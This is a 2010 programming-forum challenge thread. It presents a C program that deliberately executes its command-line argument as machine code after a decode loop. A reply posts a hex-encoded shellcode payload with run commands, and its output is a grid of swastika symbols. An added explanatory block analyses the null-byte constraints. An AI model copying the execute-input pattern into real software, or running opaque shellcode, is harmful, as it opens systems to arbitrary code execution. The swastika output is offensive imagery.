
/prog/ challenge

Name: Anonymous 2010-11-16 17:30

exploit

#include <stdio.h>
#include <string.h>

#define MAX 0xFF

int main(int argc, char **argv)
{
        if (argc != 2)
                return 1;
        else {
                char buf[MAX];
                int i;

                strncpy(buf, argv[1], MAX);

                for (i = 0; i < strlen(buf); ++i)
                        buf[i] = (buf[i] - (i % 0xF)) ^ i;

                ((void(*)())buf)();

                return 0;
        }
}

Name: Anonymous 2010-11-17 6:27

The challenge is writing a shellcode that a) doesn't contain nulls when encrypted (in order to get past the strncpy), b) doesn't contain nulls when decrypted (to get past the strlen(buf) test in the loop), and c) still does something interesting.

Here's mine. It prints out a neat fractal!


$ cat payload.txt                 
6a0e5dddeee1782a045b95832b531b98ac94fcf3fbe73e27e0450e8af099
369652f54a58e1a50d14e7061bae66c48e23aa8e7e48d5b65950d4ae6b5e
c4ec123f84ae86a82687
$ xxd -ps -r payload.txt > payload
$ ./exploitable "`cat payload`"
         卐
       卐
     卐      卐
       卐  卐  卐
 卐      卐      卐
   卐  卐  卐
     卐      卐
           卐
         卐
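
The two null-byte constraints named above, shown on the program's own copy and decode loop without executing the buffer. This is an added example, not code from either post; the function names bounded_len, copy_is_terminated and decode_in_place and the sample inputs are made up here.

```c
#include <stdio.h>
#include <string.h>

#define MAX 0xFF

/* Length of the data in buf, never scanning past cap bytes (strlen has no such bound). */
static size_t bounded_len(const unsigned char *buf, size_t cap)
{
        const unsigned char *nul = memchr(buf, 0, cap);
        return nul ? (size_t)(nul - buf) : cap;
}

/* Same copy as the thread's program: returns 1 if buf ends up NUL-terminated.
   strncpy writes no terminator when the argument is MAX bytes or longer. */
int copy_is_terminated(const char *arg)
{
        char buf[MAX];
        strncpy(buf, arg, MAX);
        return memchr(buf, 0, MAX) != NULL;
}

/* Same transform and loop condition as the thread's program, with the length
   check bounded by cap. The length is re-evaluated on the mutated buffer each
   pass, so a byte that decodes to 0 ends the loop. Returns bytes transformed. */
size_t decode_in_place(unsigned char *buf, size_t cap)
{
        size_t i;
        for (i = 0; i < bounded_len(buf, cap); ++i)
                buf[i] = (unsigned char)((buf[i] - (i % 0xF)) ^ i);
        return i;
}

int main(void)
{
        /* Constructed inputs, not taken from the thread. */
        unsigned char full[MAX] = "AAAA";                    /* no byte decodes to 0 */
        unsigned char cut[MAX] = { 0x41, 0x02, 0x42, 0x42 }; /* index 1 decodes to 0 */
        char exact[MAX + 1];

        memset(exact, 'A', MAX);                             /* exactly MAX bytes */
        exact[MAX] = '\0';

        printf("decoded %zu of 4 bytes\n", decode_in_place(full, MAX));
        printf("decoded %zu of 4 bytes\n", decode_in_place(cut, MAX));
        printf("MAX-byte argument terminated: %d\n", copy_is_terminated(exact));
        return 0;
}
```

With a MAX-byte argument the original program's strlen(buf) has no terminator to find inside buf, which is why decode_in_place takes an explicit bound.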
